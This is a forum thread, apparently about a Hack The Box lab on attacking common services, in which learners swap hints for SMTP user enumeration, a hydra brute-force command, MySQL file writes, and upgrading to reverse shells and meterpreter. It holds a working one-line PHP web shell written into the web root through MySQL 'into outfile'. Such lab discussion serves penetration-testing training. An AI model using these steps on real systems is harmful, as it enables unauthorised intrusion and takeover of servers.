Attacking Common Services - Easy

Check if user has the ability to upload files within mysql…check with command: show variables like “secure_file_priv”;

it should be blank.

now that we know this, think let upload a rev shell, because we know the we app is running PHP. Look back in the mysql module it will show you how to upload a file. Only thing you need to find out is where to upload this file.
Hint: check the phpinfo page, as it will show you the path: (/xampp/…?

Once you establish this basic shell, think how do I make this shell better/upgrade it

PM if you still need help.

It has been ages since i finished this one.
Try to gain areverse shell after you got this basic shell.

Guys, where can I find one-line reverse shell? I always try to type in one line because that’s the only way to upload a shell via MySQL, does someone have a good source?

nvm, found the answer

So this is for everyone who have obtained a webshell but are stuck afterwards. I found 2 ways in (not through ftp). The first one is not mentioned above and it is actually quite simple. And the second I was mentioned above.

1. The webshell gives you SYSTEM privileges so you can simply create another admin user account and then rdp to that user.

2. The webshell you need takes some experimenting but revshells powershell3 (base64) should work. If anyone wants to chat about why the other powershell scripts do not work, pm me. I would love to discuss it so I can understand it better.

Should I create it in the path htdocs\file.ps1?

How were you able to upload the file and what directory is it in. I don’t have inlanefreight.htb/xampp/htdocs available when I browse that page.

Because there aint such directory. Think of a full path on the machine not on the webserver.

@jtl5087 Special thank you bro!

I had the same problem.
I wasted too much time on a stupid mistake. I use just username without domain.
hydra -f smtp://{TARGET_IP} -l {FOUND_NAME}@inlanefreight.htb -P {SOME_WORDLIST} -t 64

I fount f**** login and stuck. Can anyone give a little hint what to do next?
Tried to brute ftp, smtp, rdp, sql, http auth with and without domain, but nothing. used wordlist from resources

EDIT: bruted. Don’t use pws.list from resources
Use rockyou.txt instead

easy lab

• find user using GitHub - pentestmonkey/smtp-user-enum: Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO.
• brute force the password of user (password only numbers ) [ smtp 25 ]
• access ftp you will see hint the help u for nixe step
• access mysql, and upload shell on the path of web server
• access the page and find the flag

u can use this
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\xampp\htdocs\backdoor.php”

I’ve been able to upload a backdoor with this method. However, the issue lies in accessing it. The web server allows uploads and downloads but not file executions due to which a shell won’t execute. Could you please help me with this.

Web Shell – OutRunSec This is helpful but when you upload the revershell using certutill just use http:// ***/backdoor.php?cmd=.\example.exe to execute then you will get a meterpreter session to execute shell then find the path of the flag dir /s flag.txt. There you go

Hey @topaz , I could upload the onliner webshell (SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\xampp\htdocs\MyWebshell.php”) but, I got nothing displayed in my Browser.

I can see the webshell is called but nothing is displayed, how can we get in contact via HTB Discord?

I’am stack here too , did u find any hint?

hey @Bluebreaker how I can find you on Discord channel? to give you a hand…

Hi! you can find me as @thebreaker26